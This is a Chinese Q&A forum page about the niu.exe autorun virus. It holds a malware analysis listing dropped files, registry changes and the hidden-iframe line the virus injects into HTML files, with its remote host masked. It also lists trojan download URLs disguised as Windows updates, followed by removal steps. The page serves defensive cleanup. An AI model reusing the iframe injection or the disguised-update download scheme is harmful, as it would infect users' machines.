问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

不知道为什么逻辑分区双击打不开,而且在任务管理器中会出现一个niu.exe的这么个东西

发布网友 发布时间:2022-04-27 07:06

我来回答

2个回答

热心网友 时间:2023-09-13 04:06

病毒特征:
File: niu.exe
Size: 36141 bytes
MD5: 1E3096FAE27F2E81F0AA73FFFA5171B0
SHA1: BF1639F93B2B6E6E69A32FA6ECEC8ABDB94AC7CF
CRC32: C9ACBC14
病毒运行后:
文件变化:
释放文件C:WINDOWSsystem32crsss.exe
在每个分区下面释放
autorun.inf和niu.exe 右键菜单无变化
遍历所有分区的htm文件
在其后面 插入代码<IfrAmE src=http://www.xxxxxx.cn/htm/htm.htm width=0 height=0></IfrAmE>
遍历所有分区 删除*.gho文件
删除C:WINDOWSsystem32verclsid.exe
注册表变化
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun
下添加<crsss><C:WINDOWSsystem32crsss.exe> [] 达到开机启动的目的
修改HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALLCheckedValue
为0x00000001
达到 屏蔽隐藏文件显示的目的
在HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWindowsUpdate下面增加
DisableWindowsUpdateAccess键 并把其键值设为00000001 关闭windows自动更新功能
如果无连接网络 还有如下变化
不断暴力写HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart Page为 www.hao123.com
并且修改HKCUSoftwarePoliciesMicrosoftInternet ExplorerControl PanelHomePage 的值为00000001
使得IE主页修改按钮失效
如果连接网络则为如下变化
下载http://www.xxxxxx.cn/htm/IEURL.txt到系统文件夹
该文本内为一网址 那么上面的被修改的主页则变为此文本中的网址
下载http://www.xxxxxx.cn/htm/exe.txt到系统文件夹 读取里面的内容
下载木马
http://www.xxxxxx.cn/xp/WindowsXP-KB888303-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB838201-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB284303-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB398305-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB983306-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB828301-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB328207-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB138308-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB238104-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB284302-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB468603-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB878206-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB423807-x86-CHS.exe
http://www.xxxxxx.cn/xp/WindowsXP-KB138309-x86-CHS.exe
到系统文件夹 分别命名为0temp.exe~13temp.exe
木马生成物下面将列出 其他一些变化
0temp.exe修改系统时间为1987年10月18日
1temp.exe比较有意思 1temp.exe运行以后会自动关闭瑞星防火墙 瑞星杀毒软件监控 卡卡上网安全助手的ie防漏墙
等 而此关闭并非结束进程 而是相当于用户的手动按软件上的停止保护(如图) 但再次运行该文件后 相关保护又会被开启
具体原理不懂 希望高手指教
木马植入完毕后 生成文件如下
C:WINDOWSsystem3210temp.DAT
C:WINDOWSsystem327temp.DAT
C:WINDOWSsystem32Autorun.inf
C:WINDOWSsystem32c.txt
C:WINDOWSsystem32driverssvchost.exe
C:WINDOWSsystem32d.txt
C:WINDOWSsystem32dhbini.dll
C:WINDOWSsystem32dhbpri.dll
C:WINDOWSsystem32nwizqjsj.exe
C:WINDOWSsystem32RemoteDbg.dll
C:WINDOWSsystem32test1.txt
C:WINDOWSsystem32TIMHost.dll
C:WINDOWSsystem32WinForm.dll
C:WINDOWSsystem32ztgini.dll
C:WINDOWSsystem32ztgpri.dll
C:WINDOWSTIMHost.exe
C:WINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:Program FilesInternet ExplorerPLUGINSSystem64.Sys
sreng日志如下
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<crsss><C:WINDOWSsystem32crsss.exe> []
<WinForm><C:WINDOWSWinForm.exe> []
<tlsa><C:DOCUME~1ADMINI~1LOCALS~1Temptlso.exe> []
<TIMHost><C:WINDOWSTIMHost.exe> []
<KVP><C:WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWindows]
<AppInit_DLLs><dhbpri.dll> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:Program FilesInternet ExplorerPLUGINSSystem64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:WINDOWSsystem32dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:WINDOWSsystem32ztgpri.dll> []
服务
[Remote Debug Service / RemoteDbg][Stopped/Auto Start]
<C:WINDOWSsystem32rundll32.exe RemoteDbg.dll,input><Microsoft Corporation>
解决方法:
首先把系统时间改回来
并且修改 C:WINDOWSsystem32dhbpri.dll和
C:WINDOWSsystem32ztgpri.dll文件名为其他名称
然后重启计算机进入
安全模式(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
打开sreng
启动项目 注册表 删除如下项目
[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
<crsss><C:WINDOWSsystem32crsss.exe> []
<WinForm><C:WINDOWSWinForm.exe> []
<tlsa><C:DOCUME~1ADMINI~1LOCALS~1Temptlso.exe> []
<TIMHost><C:WINDOWSTIMHost.exe> []
<KVP><C:WINDOWSsystem32driverssvchost.exe> []
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks]
<{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:Program FilesInternet ExplorerPLUGINSSystem64.Sys> []
<{22311A42-AC1B-158F-FD32-5674345F23A2}><C:WINDOWSsystem32dhbpri.dll> []
<{71351752-5628-1547-FFAB-BADC13512AF7}><C:WINDOWSsystem32ztgpri.dll> []
双击AppInit_DLLs 把其键值改为空
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
Remote Debug Service / RemoteDbg
系统修复-Windows shell/IE 选中
设置主页为"about:blank"和允许Internet Explorer选项窗口和选项窗口的所有内容
然后点击下面的修复

把下面的代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderHiddenSHOWALL]
"RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
双击1.reg把这个注册表项导入
双击我的电脑,工具,文件夹选项,查看,单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件(推荐)"前面的钩。在提示确定更改时,单击“是” 然后确定
点击 菜单栏下方的 文件夹按钮(搜索右边的按钮)
从左边的资源管理器 进入C盘
删除如下文件C:WINDOWSsystem3210temp.DAT
C:WINDOWSsystem327temp.DAT
C:WINDOWSsystem32Autorun.inf
C:WINDOWSsystem32c.txt
C:WINDOWSsystem32driverssvchost.exe
C:WINDOWSsystem32d.txt
C:WINDOWSsystem32dhbini.dll
C:WINDOWSsystem32dhbpri.dll改完名称的文件
C:WINDOWSsystem32nwizqjsj.exe
C:WINDOWSsystem32RemoteDbg.dll
C:WINDOWSsystem32test1.txt
C:WINDOWSsystem32TIMHost.dll
C:WINDOWSsystem32WinForm.dll
C:WINDOWSsystem32ztgini.dll
C:WINDOWSsystem32ztgpri.dll改完名称的文件
C:WINDOWSTIMHost.exe
C:WINDOWSWinForm.exe
%temp%tlso.exe
%temp%zxzo0.dll
%temp%tlso0.dll
C:Program FilesInternet ExplorerPLUGINSSystem64.Sys
C:WINDOWSsystem32crsss.exe
C:autorun.inf
C:niu.exe
从左边的资源管理器 进入其他分区 删除autorun.inf和niu.exe。
使用一些工具清理被感染的htm等文件。不过gho文件就没办法恢复了。

热心网友 时间:2023-09-13 04:07

我也中了,不过3分钟就解决了。
我是通过删除niu.exe来试探病毒源文件的。试删以后,又出现了!此时发现任务管理器中crsss.exe进程的CPU占用率高了5个百分点。哗!在这里!跟windows的csrss.exe真的很像(竟然之前看半天看不到...我的眼睛呀~~)。OK,关掉它,删除Windows/system32下的crsss.exe,再用右键打开每个硬盘分区,删掉里面的niu.exe和autorun.inf,大功告成,再也没发现出来了!
这方法虽然很没科技含量,但很有效哦。(资源管理器打不开的用IceSword1.20。)
呃,好像lcg.exe也是它的变种衍生版产生的垃圾文件。一样适用啊。
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
临沂比较有名的男装品牌 呼伦贝尔市悦动网络科技有限公司怎么样? 呼伦贝尔中汇实业有限公司怎么样? 呼伦贝尔油玉不绝电子商务有限公司怎么样? 如何避免wps卡顿? 属鼠的男人找对象是属什么,属鼠的人和什么属相合 96年鼠的姻缘在哪年 属相相合年份运势提升 2024属鼠找对象属什么最佳 黑客攻击网站能报案吗 黑客攻击报案有用吗 房地产行业营改增什么时候开始? 梦幻西游69可以拿的所有称谓! 房地产业、建安业建安业营营改增具体时间 批号08021301 怎样通过这个批号查厂家? 有多少个明星 http:&#47;&#47;v.ku6.com&#47;show&#47;gg9XxxY07Vc4O3of.html 背景音乐是什么? 2016年营改增新政策,营改增对房地产业有哪些影响 房地产代理商年度计划怎么写?尤其自我检验执行力和营销两部分 房地产营业收入怎么算 房地产开发企业资质年检营业盈余怎么填 房地产开发公司年度经营任务计划细分方案要怎么来写?细化到每个月,不要全部写销售目标。 求,,写好的房地产年度经营计划..我参考下.谢谢 蔚来汽车股票代码 蔚来汽车是哪个国家的牌子? 建行的信用卡那种比较好 微佳汽车:把蔚来LOGO翻过来的车标您见过么? 蔚来车标被无情抄袭,盘点汽车圈那些傻傻分不清楚的车标 如何正确推广营销自己的公众号? 反写2是什么车标? 舟的结构? 简述房地产企业长期经营计划的基本内容 梦见明天有单位同事请喝酒 7 717-28-64这什么电话 梦见同事说:他告诉我他,有人请他跟其他同事几个人一起喝酒,说变电所着火了,事情办好了请他们喝酒, 大家,房产营业税税率是多少 征求好看 动画片 2017年上海公积金销户怎么提取 诺亚传说卡69级有什么好处?卡69很好玩么? 如何查看华为平板锁屏密码? 上海公积金提取(销户) 梦幻西游69家族名,请人想个好听点的。ι.xxxx式的 上海户口公积金能销户提取吗 上海公积金如何提取 上海公积金销户提取需要户口簿原件,但是我只要复印件,,可以提取吗? 还有说的户籍证明,是要在哪办理的 华为matepad11+wifi怎样验证? 在华为IPAD上如何不用扫一扫知道连接的网络的密码? 梦见自己翻炒锅里大块肉? 梦见大块吃肉,吃不完丢到炉子里? 上海户口封存公积金可以销户提取吗 华为平板怎么识别是WiFi版?